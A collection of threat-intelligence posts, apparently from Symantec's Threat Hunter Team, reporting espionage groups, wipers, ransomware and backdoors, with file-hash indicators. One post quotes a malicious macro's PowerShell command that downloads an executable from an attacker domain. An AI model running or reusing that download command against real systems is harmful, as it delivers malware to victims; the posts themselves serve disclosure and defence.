Why did attackers using tools associated with Chinese #espionage groups compromise a significant number of telcos in one country? Was it information gathering? Eavesdropping? Developing a disruptive capability? Or something else?
Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. #SolarWinds #Raindrop #Sunburst
Update on #wiper attacks against #ukraine. In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
Interesting detail from our analysis of the decoy ransomware used in #ukraine #wiper attacks. Strings made mocking references to U.S. president Joe Biden.
Our Threat Hunter Team has encountered a new variant of #SiestaGraph, malware that interacts with Microsoft's Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4]
Our Threat Hunter Team has found some evidence that attackers linked to Black Basta may have exploited CVE-2024-26169 as a zero-day prior to patching. #ZeroDay #Ransomware #BlackBasta
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy). Recent attack involved modified version of #NightFury backdoor. (1/5)
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: and here ) (1 of 5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia. There is VBA macro code:

powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: #infosec
REVEALED: Buckeye espionage outfit was using Equation Group tools at least a year prior to the Shadow Brokers leak. Read more: #apt3 #equation #shadowbrokers
@Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia.
UPDATE on our #WastedLocker investigation. Dozens of US newspaper websites owned by the same parent company were compromised by attackers in order to infect potential targets. Symantec has notified the company and it has now removed the malicious code.
NEW: Symantec finds evidence #Waterbug attackers may have hijacked a separate espionage group's infrastructure during attack on target in Middle East. #Turla #Crambus #Oilrig
#NEW - #Graphican - #Flea (#APT15) Uses New Tool in Attacks Targeting Foreign Ministries - backdoor leverages Microsoft Graph API for C&C communication.
Think everyone who works in #infosec has been hacking since they were a kid? Not necessarily: Working in Cyber Security: "I didn't have any interest in computers when I was in school" #careeradvice